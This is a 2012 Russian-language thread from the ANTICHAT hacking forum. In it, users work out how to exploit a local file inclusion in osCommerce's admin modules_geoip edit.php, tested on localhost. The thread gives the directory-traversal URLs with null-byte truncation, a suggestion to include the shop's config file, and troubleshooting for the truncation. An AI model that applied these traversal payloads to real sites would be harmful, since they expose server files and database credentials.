ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
10.06.2012, 05:57
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332
Репутация:
38
|
|
Нашел LFI, но незнаю как реализовать...
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00
Все бы хорошо, но помимо include() эта переменная используется еще где-то:
Код:
Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18
Код:
18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');
Помогите |
|
|
15.06.2012, 05:00
|
|
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737
Репутация:
1
|
|
Сообщение от Pirotexnik
Нашел LFI, но незнаю как реализовать...
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00
Все бы хорошо, но помимо
include()
эта переменная используется еще где-то:
Код:
Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18
Код:
18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php');
Помогите http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../C:/web/htdocs/oscommerce/includes/conf не помню название конфига.php%00
Проинклудь конфиг, поиграйся.
|
|
|
|
15.06.2012, 06:20
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Pirotexnik
Шляпу экстрасенса, увы, потерял, поэтому требую код ф-ции loadIniFile =\
И строку с инклюдом данной переменной тоже неплохо бы увидеть.
pharm_all
Что-что, простите? Каким образом он проинклюдит (и как это поможет!?) если у него не работает инклюд?
|
|
|
|
15.06.2012, 07:19
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Что я делаю не так?
Сообщение от None
Все бы хорошо, но помимо include() эта переменная используется еще где-то:
Посмотрел кодес. Интересно, причем тут это вообще? Инклюд идет в первой строчке скрипта. Причем тут вообще то, что вызывается далее? |
|
|
|
16.06.2012, 17:26
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332
Репутация:
38
|
|
Да, затупил я...
Теперь вопрос по поводу .php
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi - GOOD
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.php%00 - BAD
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.gif%00 - BAD
./[4096] - тоже не спасли. Это у меня на локалхосте косяк?)
Как быть?
|
|
|
|
16.06.2012, 18:00
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
потому что скорее всего не правильно юзаешь аналог нульбайту
|
|
|
|
16.06.2012, 19:59
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
Провел на форуме:
97332
Репутация:
38
|
|
А как тгда правильно? О_о
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
